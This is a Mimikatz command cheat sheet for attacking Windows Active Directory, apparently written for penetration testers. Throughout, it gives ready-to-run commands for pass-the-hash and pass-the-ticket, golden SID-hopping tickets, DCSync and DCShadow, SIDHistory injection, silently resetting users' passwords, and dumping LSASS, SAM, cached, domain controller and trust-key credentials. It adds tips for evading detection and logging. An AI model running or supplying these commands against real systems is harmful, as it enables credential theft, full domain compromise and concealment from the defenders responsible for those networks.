Using Mimikatz
OverPass-the-Hash
Mimikatz can perform the well-known operation “OverPass-The-Hash” to run a process under the security context of another account’s credentials.
This is extremely powerful and should not be underestimated. Behind the scenes, Mimikatz requests a Kerberos ticket from the domain controller using the NTLM hash provided. The Kerberos ticket allows authentication to Kerberos services within the domain (e.g. use sekurlsa::pth to start PowerShell and you can perform lateral movement like PsExec, WMI, WinRM, etc without needing to know the plaintext password).
OverPass-the-Hash can be used to impersonate a machine account which has interesting use case scenarios (see https://blog.secarma.co.uk/labs/using-machine-account-passwords-during-an-engagement). The blog talks about a scenario where they compromised a machine and had captured the machine account NTLM hash. The machine was later taken offline but found to be the only path to Domain Admin. The solution was to use sekurlsa::pth to impersonate the machine account and perform the required operations.
sekurlsa::pth /user:manager /domain:chaos.local /ntlm:FFB91205A3D288362D86C529728B9DC0 /run:powershell sekurlsa::pth /user:WIN2008R2$ /domain:chaos.local /ntlm:FFB91205A3D288362D86C529728B9DC0 /run:powershell
Pass-The-Ticket
After a Kerberos ticket is found, it can be copied to another system and passed into the current logon session effectively simulating a logon without any communication with the Domain Controller. No special privileges are required.
/filename – the ticket’s filename (can be multiple) /diretory – a directory path, all .kirbi files inside will be injected. kerberos::ppt /filename:“theTicket.kirbi” OR kerberos::ppt /directory:"C:"
Kerberos Golden SID-Hopping Ticket
Once a single Domain Controller (specifically krbtgt hash) is compromised within a forest, you have compromised the entire forest. Mimikatz can be used to create a SID-Hopping Golden ticket to authenticate to all domains within the forest.
/user: Any user in the child domain /domain: Child domain FQDN /sid: SID of the child domain /krbtgt: KRBTGT hash for the child domain /sids: SID of enterprise admins group /ptt Optional: load the ticket into the current session kerberos::golden /user:manager /domain:fortress.citadel.local /sid:S-1-5-21-3702248245-3669926273-3383077842 /krbtgt:FFB91205A3D288362D86C529728B9DC0 /sids:S-1-5-21-2244208837-681476370-1982983775-519 /ptt
ChangeNTLM (Updating Passwords)
There are rare scenarios where you know a user’s NTLM hash and need their password but are unable to crack the NTLM hash. You can change the user’s password to a value you control, and then change it back without them knowing using Mimikatz. This can also be useful when you compromise an account with an expired password. The Mimikatz change be used to update the password without elevated privileges. Use the command net user $username /domain to check if the account has change password privileges (almost always) and if they have changed their password since compromising the NTLM hash.
lsadump::changentlm /server:dc.lab.local /user:sample [/oldntlm OR /oldpassword] [/newntlm OR /newpassword] lsadump::changentlm /server:dc.lab.local /user:sample /oldntlm:FFB91205A3D288362D86C529728B9DC0 /newpassword:kiwi lsadump::changentlm /server:dc.lab.local /user:sample /oldpassword:kiwi /newntlm:FFB91205A3D288362D86C529728B9DC0
DCSync
Use replication privileges (domain admins have this by default) to synchronise any accounts credential material (including the NTLM hash).
lsadump::dcsync /domain:chaos.local /user:CHAOS\\Administrator
lsadump::dcsync /domain:chaos.local /all /csv
Download an object using its GUID
Dumping Trust Keys using DCSync
Get-ADObject -LDAPFilter ('objectClass=trustedDomain') | Select name,objectguid lsadump::dcsync /guid:{aaa17f7f-715d-4e99-b613-1d9ae7ffee0f}
DCShadow
DCShadow allows the modification, creation and deletion of objects, object metadata and schema without any logging. See: https://www.dcshadow.com/
lsadump::dcshadow /object:"whatever" /attribute:"" /value:"" lsadump::dcshadow /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local /attribute:description /value:"DCShadow was here!" lsadump::dcshadow /push
http://www.labofapenetrationtester.com/2018/04/dcshadow.html ## SIDHistory Very useful, also mentioned in the DCShadow presentation. Set the SIDHistory of an account to a high privilege one like DA or EA group and we are all set for highest privileges without having to modify any Group Membership or ACL.
lsadump::dcshadow /object:helpdeskuser /attribute:SIDHistory /value:S-1-5-21-3270384115-3177237293-604223748-519
NetSync
This is a legacy protocol and should only really be used when you think DCSync will get detected. NetSync is more limited in comparison to DCSync in that it only allows synchronising machine accounts and only accepts machine accounts to perform the operations.
lsadump::netsync /dc:chaos.local /user:dc$ /ntlm:FFB91205A3D288362D86C529728B9DC0 /account:DESKTOP-WARDOG$
Log Credentials to File (Bypassing Credential Guard)
privilege::debug misc::memssp
Credentials are written to the file C:\\Windows\\System32\\mimilsa.log.
Dump Passwords (Memory and Registry)
The sekurlsa::logonpasswords module will list all available credential material in all default Microsoft Windows credential providers. This includes msv, wdigest, tspkg, ssp, credman, ekeys, etc. Mimikatz cannot dump credential material stored in custom credential providers as the memory offsets will not be known.
sekurlsa::logonpasswords sekurlsa::ekeys lsadump::sam lsadump::cache lsadump::secrets ts::logonpasswords ts::mstsc vault::list vault::cred dpapi::wifi dpapi::wwan
NTLM hashes can be used to perform PTH attacks and authenticate to services supported NTLM authenticating. It can also be used to request a Kerberos ticket for Kerberos services. The most common scenarios include PsExec, WMI and WinRM. From Memory Dump:
sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full
Dump Domain Controller Credentials
Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use /patch for a subset of data, use /inject for everything. Requires System or Debug rights on a Domain Controller. The /patch method should be considered more OPSEC safe. See:
https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html
Don’t specify a name to dump all hashes
lsadump::lsa /inject /name:krbtgt
lsadump::lsa /patch /name:krbtgt
sekurlsa::krbtgt
Dump Domain Controller Trust Keys
Extracts data from Active Directory for existing trust relationships for the domain. The trust key (password) is displayed as well.
lsadump::trust /patch
